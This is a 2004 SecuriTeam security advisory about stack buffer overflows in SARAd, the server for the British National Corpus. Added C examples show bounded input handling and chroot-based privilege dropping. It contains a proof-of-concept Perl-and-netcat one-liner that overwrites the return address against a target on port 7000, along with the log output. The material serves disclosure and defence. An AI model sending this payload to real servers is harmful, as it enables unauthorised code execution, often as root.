[UNIX] SARAd Buffer Overflow Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 08/25/04
To: list@securiteam.com Date: 25 Aug 2004 16:39:34 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
SARAd Buffer Overflow Vulnerability
------------------------------------------------------------------------
SUMMARY
SARA (http://www.natcorp.ox.ac.uk/SARA/) is specialized software used
to serve the British National Corpus (BNC) content. The British National
Corpus is used by many linguists for research on the English language and
is licensed commercially by the BNC Consortium. The server software runs on
various flavors of Unix and is freely available as source.
There are several buffer overflows present in the SARA server (SARAd), one
of which is exploitable allowing an attacker to execute arbitrary code on
the server.
DETAILS
Vulnerable Systems:
* SARA latest version, 16th April 2001
Successful exploitation of the buffer overflow results in code execution
with the privileges of the SARA daemon, which should run under a dedicated
unprivileged account; in practice, however, most installations run it as
root. The daemon requires no authentication, so an attack is easy to carry
out.
The overflows are classic stack-based buffer overflows caused by
insufficient bounds checking, allowing the attacker to overwrite the
return address. The following Perl snippet performs a return-to-libc on
Linux 2.6.7/glibc 2.3.2, logging some garbage by jumping into syslog():
perl -e 'print "SUCK" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);' \
| netcat victim 7000
The output from this simple operation is:
Aug 19 20:50:05 drgonzo sarad[2449]: Connect from huxley.lan
Aug 19 20:50:05 drgonzo sarad[6519]: Client sent string SUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCK @
Aug 19 20:50:05 drgonzo sarad[6519]: syslog: unknown facility/priority: 80e5540
Aug 19 20:50:05 drgonzo sarad[6519]:P^F
Aug 19 20:50:05 drgonzo sarad[2449]: Forked process 6519
Aug 19 20:50:05 drgonzo sarad[2449]: Child pid=6519 was killed with signal 11
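The bug class described above (a client-supplied string copied into a fixed stack buffer with no length check) next to the check that prevents it, as an added C example that is not part of the advisory and not taken from the SARA source. handle_client_string_unsafe() shows the vulnerable pattern and is defined only for contrast; copy_client_string() and read_line_bounded() are the hardened forms; probe_through_pipe() pushes a constructed message through a pipe so the reader can be exercised without a network socket. The buffer size LINE_CAP, all function names and the sample inputs are assumptions of this example.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Size of the hypothetical per-client line buffer. The value is an
 * assumption for this example; it is not taken from the SARA source. */
#define LINE_CAP 44

/* The vulnerable pattern (defined here for contrast, never called): the
 * client string lands in a fixed stack buffer with no length check, so any
 * string longer than the buffer runs past it over the saved return address. */
void handle_client_string_unsafe(const char *client_string)
{
    char line[LINE_CAP];
    strcpy(line, client_string);      /* unbounded copy: the bug class */
    (void)line;
}

/* Hardened copy: refuse anything that would not fit together with its NUL
 * terminator before writing a single byte. 0 on success, -1 with EMSGSIZE. */
int copy_client_string(const char *in, size_t in_len, char *out, size_t out_cap)
{
    if (out_cap == 0 || in_len >= out_cap) {
        errno = EMSGSIZE;
        return -1;
    }
    memcpy(out, in, in_len);
    out[in_len] = '\0';
    return 0;
}

/* Convenience wrapper: run a NUL-terminated client string through the
 * hardened copy into a LINE_CAP buffer and report whether it was accepted. */
int accept_client_string(const char *s)
{
    char line[LINE_CAP];
    return copy_client_string(s, strlen(s), line, sizeof line);
}

/* Bounded line reader for a connected socket or pipe. Never stores more than
 * cap-1 bytes plus the terminator; if the client sends more than that without
 * a newline the call fails with -1/EMSGSIZE instead of overflowing.
 * Returns the line length on success (EOF without a newline also counts). */
ssize_t read_line_bounded(int fd, char *buf, size_t cap)
{
    size_t n = 0;
    if (cap == 0) { errno = EINVAL; return -1; }
    for (;;) {
        char c;
        ssize_t r = read(fd, &c, 1);
        if (r < 0) return -1;                      /* errno set by read() */
        if (r == 0 || c == '\n') { buf[n] = '\0'; return (ssize_t)n; }
        if (n == cap - 1) { buf[n] = '\0'; errno = EMSGSIZE; return -1; }
        buf[n++] = c;
    }
}

/* Feed a constructed payload through a pipe so the reader can be exercised
 * offline; returns whatever read_line_bounded() returned. */
ssize_t probe_through_pipe(const char *payload, size_t payload_len)
{
    char line[LINE_CAP];
    int fds[2];
    ssize_t res;
    if (pipe(fds) < 0) return -1;
    if (write(fds[1], payload, payload_len) != (ssize_t)payload_len) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    close(fds[1]);                                 /* peer "hangs up" */
    res = read_line_bounded(fds[0], line, sizeof line);
    close(fds[0]);
    return res;
}

/* Constructed input shaped like the advisory's probe: 44 filler bytes, four
 * more where an overwritten return address would sit, then a newline. */
ssize_t oversized_probe_result(void)
{
    char payload[LINE_CAP + 5];
    memset(payload, 'A', LINE_CAP + 4);
    payload[LINE_CAP + 4] = '\n';
    return probe_through_pipe(payload, sizeof payload);
}

int main(void)
{
    printf("short line accepted: %s\n",
           probe_through_pipe("hello\n", 6) == 5 ? "yes" : "no");
    printf("oversized probe rejected: %s\n",
           oversized_probe_result() == -1 ? "yes" : "no");
    return 0;
}
```

A daemon using read_line_bounded() still has to decide what to do on -1/EMSGSIZE; logging the event and closing the connection is the usual choice, and such log entries are also a useful detection signal for probes like the one shown in the advisory.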
Patch Availability:
Although there is no official patch and the program is quite old, there
are two unofficial patches: one that should be suitable for all systems
and fixes the above-mentioned bugs, and one that does the same and
additionally lets the SARA daemon automatically chroot itself to the corpus
directory and drop its privileges to a specified account. The latter will
not compile on Windows machines, even though the server itself can be
compiled on Windows.
You can get the patches, including fairly simple installation instructions,
from
http://www.linguistik.uni-erlangen.de/~msbethke/binaries/sara-fix.tar.gz
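What the second unofficial patch is described as doing, confining the daemon to the corpus directory and dropping to a dedicated account, written out as an added C example. This is not the patch's code: the function names, the order of calls, and the placeholder corpus directory and account name are this example's own assumptions; getpwnam(), chroot(), setgroups(), setgid() and setuid() are standard POSIX/glibc calls.

```c
#define _DEFAULT_SOURCE   /* glibc: expose chroot() and setgroups() */
#include <errno.h>
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* A target of uid 0 or gid 0 is not a privilege drop at all; refuse it so a
 * misconfigured "run as root" setting cannot pass silently. */
int check_unprivileged_target(uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0) {
        errno = EINVAL;
        return -1;
    }
    return 0;
}

/* Confine the daemon to corpus_dir and switch to `account`. Order matters:
 * chroot() and chdir("/") happen while still root (the chdir keeps the
 * working directory from pointing outside the jail), then supplementary
 * groups, the gid and finally the uid are dropped; gid before uid, because
 * setgid() is no longer permitted once the uid is unprivileged.
 * Returns 0 on success, -1 with errno set on failure. */
int confine_and_drop(const char *corpus_dir, const char *account)
{
    struct passwd *pw;
    errno = 0;
    pw = getpwnam(account);
    if (pw == NULL) {
        if (errno == 0) errno = ENOENT;           /* no such account */
        return -1;
    }
    if (check_unprivileged_target(pw->pw_uid, pw->pw_gid) < 0) return -1;

    if (chroot(corpus_dir) < 0) return -1;        /* needs root */
    if (chdir("/") < 0) return -1;

    if (setgroups(0, NULL) < 0) return -1;
    if (setgid(pw->pw_gid) < 0) return -1;
    if (setuid(pw->pw_uid) < 0) return -1;

    /* Sanity check: regaining root must now fail, or the drop was ineffective. */
    if (setuid(0) == 0) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    /* Placeholder values for this example; a real daemon would take them
     * from its configuration. */
    const char *corpus_dir = "/path/to/corpus";   /* placeholder */
    const char *account = "sara";                  /* placeholder */
    if (confine_and_drop(corpus_dir, account) < 0) {
        perror("confine_and_drop");
        return 1;
    }
    printf("running as uid %u, confined to %s\n",
           (unsigned)getuid(), corpus_dir);
    return 0;
}
```

confine_and_drop() has to run before the listening socket starts accepting clients, and the mistake to watch for in hand-written versions is an omitted chdir("/"), which leaves the process with a working directory outside the new root.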
ADDITIONAL INFORMATION
The information has been provided by Matthias Bethke
(Matthias.Bethke@gmx.net).
========================================
This bulletin is sent to members of the SecuriTeam mailing list.